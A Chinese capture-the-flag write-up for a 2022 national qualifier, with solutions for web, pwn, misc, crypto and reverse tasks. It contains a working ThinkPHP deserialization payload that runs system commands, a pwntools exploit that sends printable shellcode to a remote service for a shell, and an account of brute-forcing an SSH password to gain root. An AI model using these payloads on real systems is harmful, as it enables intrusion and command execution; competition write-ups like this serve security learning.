2022国赛初赛 干煸豆角wp

Web

online_crt

 

cmdbrowser

 

Ezpentest

 

ezpop

现成链子
<?php
// Payload generator for the ready-made think\Model / think\model\Pivot
// deserialization chain (ThinkPHP naming) used on this task.  The two classes
// below are stubs: they only declare the property names and visibilities that
// serialize() encodes, and the constructor fills in the values the chain
// expects (they are consumed by the framework's own Model code, not shown
// here).  Running the file prints the URL-encoded serialized object that the
// write-up posts as parameter "a" in the next step.
namespace think{
    abstract class Model{
        private $lazySave = false;
        private $data = [];
        private $exists = false;
        protected $table;
        private $withAttr = [];
        protected $json = [];
        protected $jsonAssoc = false;
        // $obj is stored as $table; the outer Pivot wraps an inner Pivot, so the
        // same chain is nested once.
        function __construct($obj = ''){
            $this->lazySave = True;
            $this->data = ['whoami' => ['cat /flag.txt']];
            $this->exists = True;
            $this->table = $obj;
            $this->withAttr = ['whoami' => ['system']];
            $this->json = ['whoami',['whoami']];
            $this->jsonAssoc = True;
        }
    }
}
namespace think\model{
    use think\Model;
    // Concrete subclass so the abstract Model can be instantiated and serialized.
    class Pivot extends Model{
    }
}
namespace{
    // Mitigation note: the chain is only reachable because the endpoint
    // (presumably) hands a request parameter to unserialize(); serialized data
    // coming from the client has to be treated as untrusted.
    echo(urlencode(serialize(new think\model\Pivot(new think\model\Pivot()))));
}
访问?s=index/test
post : a=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22cat+%2Fflag.txt%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22cat+%2Fflag.txt%22%3B%7D%7Ds%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3Bs%3A0%3A%22%22%3Bs%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%22whoami%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3Bi%3A1%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7D%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3B%7D
flag.txt 在根目录下
 
 
 

Pwn

login-normal

# -*- coding: UTF-8 -*- from pwn import * from LibcSearcher import * context.arch = 'amd64' context.log_level = 'debug' local_file = './login' #libc = ELF('/home/yjc/Desktop/Libc/U16/libc-2.23-32.so') select = 1 if select == 0: p = process(local_file) libc = ELF('/glibc/x64/2.23/lib/libc-2.23.so') #gdb.attach(p) else: p = remote('59.110.105.63',32241) libc = ELF('/home/yjc/Desktop/Libc/U18/libc-2.27-64.so') #libc = ELF(remote_libc) elf = ELF(local_file) p.recvuntil(">>> ") # gdb.attach(p) '''shellcode = push 0x68 push 0x732f2f2f push 0x6e69622f push esp pop ebx push edx push 0x4f pop ecx push edx pop eax sub byte ptr[eax + 0x3a] , cl sub byte ptr[eax + 0x3a] , cl push 0x60 pop ecx sub byte ptr[eax + 0x3b] , cl sub byte ptr[eax + 0x3b] , cl push 0x40 pop eax xor al,0x40 push eax pop edx xor al, 0x40 xor al, 0x4b push edx pop ecx push edx pop edx push edx pop edx push edx pop edx push edx pop edx push edx pop edx ''' shellcode = 'Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t' p.sendline("opt:1\nmsg:ro0tt\n") # p.sendline("opt:1\n") p.recvuntil(">>> ") p.sendline("opt:2\nmsg:" + shellcode + '\n') p.interactive()
分析出来每次发送必须同时带有 opt 和一个 msg:先用 opt 传 1,msg 传入 ro0tt(最后一位会被去掉,所以多加一个 t),这样就把 $rebase(0x202024) 处修改为 1;然后第二次输入 opt:2,msg 传入 shellcode 即可。shellcode 不能包含 '\n'、'\t' 等会被过滤的字符,同时必须全部可见(可打印),输进去就 getshell。

Misc

ez_usb

对usb流量包进行分析
tshark -r ez_usb.pcapng -T fields -e usb.capdata | sed '/^\s*$/d' > ez_usb.txt
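# -*- coding: utf-8 -*-
"""Reformat raw USB capture data (tshark ``usb.capdata``) into colon-separated bytes.

Each input line is the hex payload of one USB packet.  Only 16-hex-digit lines
(8-byte keyboard reports) are kept; each is rewritten as
``xx:xx:xx:xx:xx:xx:xx:xx`` on its own line of output.txt.

Fixes over the original one-liner: the coding declaration was malformed
(``encoding = utf-8`` is not recognised by the interpreter), both files were
never closed, and the loop stopped at the first blank line instead of
skipping it.
"""


def format_capdata(hexdata):
    """Return *hexdata* split into 2-digit groups joined by ':'.

    ``"0000040000000000"`` -> ``"00:00:04:00:00:00:00:00"``.  The input is
    expected to have even length; an empty string yields an empty string.
    """
    return ":".join(hexdata[i:i + 2] for i in range(0, len(hexdata), 2))


def convert(src='ez_usb.txt', dst='output.txt'):
    """Rewrite the 16-digit lines of *src* into *dst*; return the number written.

    Lines of any other length (including blank ones) are skipped, matching
    the original filter, and both files are closed via ``with``.
    """
    written = 0
    with open(src, 'r') as f, open(dst, 'w') as fi:
        for raw in f:
            a = raw.strip()
            if len(a) == 16:
                fi.write(format_capdata(a) + '\n')
                written += 1
    return written


if __name__ == "__main__":
    convert()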
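"""Decode USB HID keyboard reports from output.txt into the typed text.

Each line is one 8-byte report written as ``mm:00:kk:00:00:00:00:00`` (the
format produced by the conversion script above): ``mm`` is the modifier byte
(``00`` none, ``02`` left shift) and ``kk`` the keycode of the single pressed
key.  Keycodes are mapped through the two tables below, then the ``<DEL>``
and ``<CAP>`` markers are applied to rebuild what was typed.

Fixes over the original: the final ``print`` was missing its closing
parenthesis, a ``<DEL>`` at position 0 deleted the *last* token, the CAP
pass popped from the list it was indexing, and all errors were hidden by
bare ``except: pass``.
"""

normalKeys = {
    "04": "a", "05": "b", "06": "c", "07": "d", "08": "e", "09": "f",
    "0a": "g", "0b": "h", "0c": "i", "0d": "j", "0e": "k", "0f": "l",
    "10": "m", "11": "n", "12": "o", "13": "p", "14": "q", "15": "r",
    "16": "s", "17": "t", "18": "u", "19": "v", "1a": "w", "1b": "x",
    "1c": "y", "1d": "z", "1e": "1", "1f": "2", "20": "3", "21": "4",
    "22": "5", "23": "6", "24": "7", "25": "8", "26": "9", "27": "0",
    "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t",
    "2c": "<SPACE>", "2d": "-", "2e": "=", "2f": "[", "30": "]",
    "31": "\\", "32": "<NON>", "33": ";", "34": "'", "35": "<GA>",
    "36": ",", "37": ".", "38": "/", "39": "<CAP>", "3a": "<F1>",
    "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>",
    "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>",
    "44": "<F11>", "45": "<F12>",
}

shiftKeys = {
    "04": "A", "05": "B", "06": "C", "07": "D", "08": "E", "09": "F",
    "0a": "G", "0b": "H", "0c": "I", "0d": "J", "0e": "K", "0f": "L",
    "10": "M", "11": "N", "12": "O", "13": "P", "14": "Q", "15": "R",
    "16": "S", "17": "T", "18": "U", "19": "V", "1a": "W", "1b": "X",
    "1c": "Y", "1d": "Z", "1e": "!", "1f": "@", "20": "#", "21": "$",
    "22": "%", "23": "^", "24": "&", "25": "*", "26": "(", "27": ")",
    "28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t",
    "2c": "<SPACE>", "2d": "_", "2e": "+", "2f": "{", "30": "}",
    "31": "|", "32": "<NON>", "33": "\"", "34": ":", "35": "<GA>",
    "36": "<", "37": ">", "38": "?", "39": "<CAP>", "3a": "<F1>",
    "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>",
    "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>",
    "44": "<F11>", "45": "<F12>",
}


def decode_hid_lines(lines):
    """Map each valid report line in *lines* to one token; return the list.

    A line is used only when the modifier is ``00`` or ``02``, the reserved
    byte is ``00``, exactly one key is down (the remaining keycode slots are
    ``00``) and the keycode is not ``00`` -- the same filter the original
    expressed by character positions.  Unknown keycodes become
    ``'[unknown]'``; malformed lines are skipped explicitly.
    """
    output = []
    for line in lines:
        fields = line.strip().split(':')
        if len(fields) != 8:
            continue
        modifier, reserved, key = fields[0], fields[1], fields[2]
        if modifier not in ('00', '02') or reserved != '00' or key == '00':
            continue
        if any(slot != '00' for slot in fields[3:]):
            continue  # more than one key down; skipped, as in the original
        if key in normalKeys:
            table = shiftKeys if modifier == '02' else normalKeys
            output.append(table[key])
        else:
            output.append('[unknown]')
    return output


def apply_backspaces(tokens):
    """Return *tokens* with every ``<DEL>`` and the token before it removed.

    A ``<DEL>`` with nothing before it is dropped on its own (the original
    deleted the last element of the list in that case).
    """
    result = []
    for tok in tokens:
        if tok == '<DEL>':
            if result:
                result.pop()
        else:
            result.append(tok)
    return result


def apply_capslock(tokens):
    """Upper-case single characters between paired ``<CAP>`` markers.

    The markers themselves are dropped; multi-character tokens such as
    ``<RET>`` or ``[unknown]`` are left as they are.
    """
    result = []
    caps = False
    for tok in tokens:
        if tok == '<CAP>':
            caps = not caps
            continue
        if caps and len(tok) == 1:
            tok = tok.upper()
        result.append(tok)
    return result


def main(path='output.txt'):
    """Print the raw token stream, then the text with DEL/CAP applied."""
    with open(path) as keys:
        output = decode_hid_lines(keys)
    print("".join(output))
    output = apply_capslock(apply_backspaces(output))
    print('output :' + "".join(output))


if __name__ == "__main__":
    main()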
得到压缩包
notion image
分析发现是个加密压缩包
526172211a0700Cf907300000d00000000000000c4527424943500300000002A00000002b9f9b0530778b5541d33080020000000666c61672E747874B9Ba013242f3aFC000b092c229d6e994167c05A78708b271fFC042ae3d251e65536F9Ada87c77406b67d0E6316684766a86e844dC81AA2c72c71348d10c43D7B00400700
直接导出密码流失败了,于是导出rar+密码流(wireshark过滤host和2.8.1)相减求出密码
526172211a0700Cf907300000d00000000000000c4527424943500300000002A0000000235b9f9b0530778b5541d3308c50020000000666c61672E747874B9Ba0132357642f3aFC000b092c229d6e994167c055eA78708b271fFC042ae3d251e65536F9Ada5087c77406b67d0E631668476607a86e844dC81AA2c72c714a348d10c43D7B00400700
求出压缩包密码:35c535765e50074a
解压得到flag
 

everlasting_night

png后面有16个字节,反解md5,得到ohhWh04m1
找了很久的md5反解
notion image
 
notion image
用带密码的lsb 解出 https://github.com/livz/cloacked-pixel 得到一个压缩包
密码是f78dcd383f1b574b 解压得到文件
notion image
修改后缀名 flag.data
放入GIMP得到flag
notion image

Crypto

签到电台

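"""exp: mod-10 pad check for the 签到电台 task.

The codebook digits (``mimaben``, the first 28 digits of ``mimaben_org``) are
added digit by digit modulo 10 to the seven four-digit telegraph codes of the
plaintext (``mima``); the result is the expected answer ``ans``.  The
original only listed the three strings and the comment "模10 加"; the helper
below performs that addition so the relation can be checked.
"""

mimaben_org = "6056625155417376265806524810771817861278018532806667458389075368594555947239361591188881261917633075906211469015278797703169250487592076153068195028219452855387768105734781974612620005515008159366009133505290315158625152698682334624143812100290439550905318740826215219174073696492924772426919464050025517581027109618149149276239517963033727222936687528963810198377989562332644080010320634491176419733030755579309399068482495916804890335884402616717300634429243976411609905661228406504206446828623236718794471138745428154944961726"
mimaben = "6056 6251 5541 7376 2658 0652 4810"  # 密码本 (codebook / pad)
mima = "1732 2514 1344 0356 0451 6671 0055"  # "弼时安全到达了"所对应的7个电码 (7 telegraph codes of the plaintext)
ans = "7788 8765 6885 7622 2009 6223 4865"  # 模10 加 (digit-wise addition mod 10)


def mod10_add(a, b):
    """Add the digits of *a* and *b* position by position modulo 10.

    Spaces in either string are ignored; the result is a plain digit string
    without spaces.  Raises ValueError if the digit counts differ.
    """
    da = a.replace(" ", "")
    db = b.replace(" ", "")
    if len(da) != len(db):
        raise ValueError("digit strings differ in length")
    return "".join(str((int(x) + int(y)) % 10) for x, y in zip(da, db))


if __name__ == "__main__":
    result = mod10_add(mimaben, mima)
    print(result)
    print(result == ans.replace(" ", ""))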
notion image
 

基于挑战码的双向认证 1 和 2

非预期
notion image
notion image

基于挑战码的双向认证 3

看了看100多人解出来猜到有非预期解 尝试cat 发现权限不够,尝试提权,同时对ssh密码进行爆破,结果在我提权出来之前先爆出来了,密码是toor
于是root权限 直接cat
notion image

Re

baby_tree
SwiftAST,能看的是中间语言,比较长但不是很复杂
# Forward (encryption) step as read off the Swift AST (see the note above),
# written informally.  NOTE(review): this is pseudo-code, not runnable Python --
# r0..r3 are not defined in the sketch (judging by the inverse below they are
# the four plaintext bytes b[i..i+3] before the step), the second line has one
# closing parenthesis too many, and `k[0,1,2,3] = k[1,2,3,0]` is shorthand for
# rotating the 4-byte key left by one after each step.
for i in range(len(b)-4):
    b[i] = r2 ^ ((k[0] + (r0 >> 4)) & 0xff)
    b[i+1] = r3 ^ (k[1] + (r1 >> 2)) & 0xff)
    b[i+2] = r0 ^ k[2]
    b[i+3] = r1 ^ k[3]
    k[0,1,2,3] = k[1,2,3,0]
逆向出来的代码
# Inverse of the step above: walk the blocks backwards, rotate the key right
# before each block (undoing the forward left rotation) and recover the four
# plaintext bytes in place.
# NOTE(review): as transcribed this does not run -- `t` is never initialised
# (presumably it should start at the last block index, len(b)-5), the loop
# decrements `i` instead of `t` and does so outside the loop body, and
# `b[t+2)]` carries a stray ')'.  Confirm against the original solve script.
b = [88,35,88,225,7,201,57,94,77,56,75,168,72,218,64,91,16,101,32,207,73,130,74,128,76,201,16,248,41,205,103,84,91,99,79,202,22,131,63,255,20,16]
k = [121,51,52,53]  # key bytes; whether this is the initial or the final rotated state is not stated
while t>=0:
    k[0],k[1],k[2],k[3] = k[3],k[0],k[1],k[2]  # rotate right: inverse of the forward rotation
    r1 = k[3] ^ b[t+3]
    r0 = k[2] ^ b[t+2)]
    r3 = ((k[1] + (r1 >> 2)) & 0xff) ^ b[t+1]
    r2 = ((k[0] + (r0 >> 4)) & 0xff) ^ b[t+0]
    b[t],b[t+1],b[t+2],b[t+3] = r0,r1,r2,r3
i -= 1
for i in b:
    print(chr(i),end='')
 